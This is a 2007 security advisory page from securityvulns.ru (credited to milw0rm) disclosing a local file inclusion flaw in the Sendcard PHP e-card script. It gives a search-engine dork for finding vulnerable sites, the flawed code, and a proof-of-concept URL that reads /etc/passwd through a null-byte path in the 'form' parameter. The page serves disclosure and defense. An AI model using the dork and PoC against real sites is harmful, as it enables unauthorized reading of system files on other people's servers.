Computer Security

Security Advisory: Sendcard (sendcard.php) Sendcard Local File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [ECHO_ADV_81$2007] wordpress plugins wordTube <= 1.43 (wpPATH) Remote File Inclusion Vulnerability

  [ECHO_ADV_82$2007] wordpress plugins wp-Table <= 1.43 (inc_dir) Remote File Inclusion Vulnerability

  Wordpress plugin myflash <= V1.00  (wppath) RFI Vulnerability

  E-Annu (home.php) Remote SQL Injection Vulnerability

From:ettee <etteeettee_(at)_gmail.com>
Date:02.05.2007
Subject:Sendcard (sendcard.php) Sendcard Local File Inclusion Vulnerability

Sendcard  (sendcard.php) Sendcard Local File Inclusion Vulnerability

Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
        "powered by Sendcard"

Bug:
"// Get the template details
if(!isset($form) || $form == ''){
   $form = "form";
}
if(!isset($des) || $des == ''){
   $des = "card";
}
if (!isset($template) || $template == '') {
   $template = 'message';
}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00

# milw0rm.com [2007-05-01]
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


Rating@Mail.ru